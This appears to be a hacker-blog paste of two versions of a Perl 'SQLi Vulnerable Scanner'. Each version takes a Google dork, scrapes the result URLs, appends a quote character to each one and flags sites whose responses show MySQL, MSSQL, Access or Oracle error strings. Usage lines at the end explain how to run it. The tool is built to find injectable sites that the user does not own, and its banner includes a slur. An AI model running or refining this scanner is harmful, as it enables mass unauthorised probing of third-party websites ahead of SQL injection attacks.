SQLi Vulnerable Scanner script - Dr.1n73ct10n

1. 1. script SQLi Vulnerable scanner perl version 0.0.2 :
2.  
3.  
4. #!/usr/bin/perl
5. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
6. # .:. Script : SQLi Vulnerable Scanner perl   .:.
7. # .:. Version : 0.0.1 created (03/26/2014)    .:.
8. # .:. Author : Dr.1n73ct10n                   .:.
9. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
10. # .:. MySQL Injection                         .:.
11. # .:. MSAccess Injection                      .:.
12. # .:. MSSQL Injection                         .:.
13. # .:. Oracle Injection                        .:.
14. # .:. Blind Injection                         .:.
15. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
16. #  Useless version :
17. #  recode by Dr.1n73ct10n
18. use LWP::UserAgent;
19. use Getopt::Std;
20.  
21. getopt('kpo', \%opts);
22. if($opts{'k'} eq '')
23. {
24. print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
25. }
26. if($opts{'p'} eq '')
27. {
28.     $opts{'p'} = 1;
29. }
30.  
31. print <<"Dr.1n73ct10n_intro";
32.  
33.  
34. (_)   _        _   _________    ___________
35. | |  | |      | | /---------    ___________
36. | |  | |      | | || coder by :     | |
37. | |  | |------| | || Dr.1n73ct10n   | |
38. | |  | |------| | ||________        | |  
39. |_|  |_|      |_| \---------        |_|
40.  
41.  
42. intro_scan
43. system('COLOR A');
44. print "\n\n";
45. print "h4x0ring ...\n";
46. print "--------------------------\n\n";
47.  
48.  
49. for($start = 0;$start != $opts{'p'}*10;$start += 10)
50. {
51.     $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
52.     $ua = LWP::UserAgent->new;
53.     $ua->timeout(10);
54.     $ua->env_proxy;
55.     $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
56.     $response = $ua->get($t);
57.     if ($response->is_success)
58.     {
59.         $c = $response->content;
60.         @stuff = split(/<a href=/,$c);
61.         foreach $line(@stuff)
62.         {
63.             if($line =~/(.*) class=l/ig)
64.             {
65.                 $out = $1;
66.                 $out =~ s/"//g;
67.       $out =~s/$/\'/;
68.          
69.    $ua = LWP::UserAgent->new;
70.    $ua->timeout(10);
71.    $ua->env_proxy;
72.    $response = $ua->get($out);
73.            $error = $response->content();
74.            if($error =~m/SQL syntax/)
75.                {print "$out Vulnerable MySQL!\n";}
76.              
77.            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
78.                {print "$out Vulnerable MS Access!\n";}
79.              
80.            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
81.                {print "$out Vulnerable MSSQL!\n";}
82.          
83.            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
84.                {print "$out Vulnerable Blind Possible!\n";}
85.              
86.            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
87.                {print "$out Vulnerable Oracle!\n";}
88.              
89.            }
90.        }
91.        }
92.        }
93.  
94.  
95.  
96. 2. script SQLi Vulnerable scanner perl version 0.0.1 :
97.  
98. #!/usr/bin/perl
99. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
100. # .:. Script : SQLi Vulnerable Scanner        .:.
101. # .:. Version : 0.0.1                         .:.
102. # .:. Author : Dr.1n73ct10n                   .:.
103. # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
104. # .:. MySQL Injection
105. # .:. MSAccess Injection
106. # .:. MSSQL Injection
107. # .:. Oracle Injection
108. # .:. Blind Injection
109. #
110. #
111. use LWP::UserAgent;
112. use Getopt::Std;
113.  
114. getopt('kpo', \%opts);
115. if($opts{'k'} eq '')
116. {
117. print "example:perl sql.pl -k intext:"mysql_fetch_array()"= -p 100\n";
118. }
119. if($opts{'p'} eq '')
120. {
121. $opts{'p'} = 1;
122. }
123.  
124. print "o0o0o0o00o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o\n";
125. print "0 x90 o\n";
126. print "o Gay Sql Scanner o\n";
127. print "0 indonesiahackercyberteam.blogspot.com o\n";
128. print "o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0\n";
129.  
130. for($start = 0;$start != $opts{'p'}*10;$start += 10)
131. {
132. $t = "http://www.google.com/search?hl=en&q=".$opts{'k'}."&btnG=Search&start=".$start;
133. $ua = LWP::UserAgent->new;
134. $ua->timeout(10);
135. $ua->env_proxy;
136. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
137. $response = $ua->get($t);
138. if ($response->is_success)
139. {
140. $c = $response->content;
141. @stuff = split(/<a href=/,$c);
142. foreach $line(@stuff)
143. {
144. if($line =~/(.*) class=l/ig)
145. {
146. $out = $1;
147. $out =~ s/"//g;
148. $out =~s/$/\'/;
149.  
150. $ua = LWP::UserAgent->new;
151. $ua->timeout(10);
152. $ua->env_proxy;
153. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
154. $response = $ua->get($out);
155. $error = $response->content();
156. if($error =~m/SQL syntax/)
157. {
158. print "$out:could be vulnerable!\n";
159. }
160.  
161. }
162. }
163. }
164. }
165.  
166.  
167. NB : software command : perl namefile.pl -k <dork> -p <page>
168.     example : perl sql.pl -k intext:"mysql_fetch_array()"= -p 100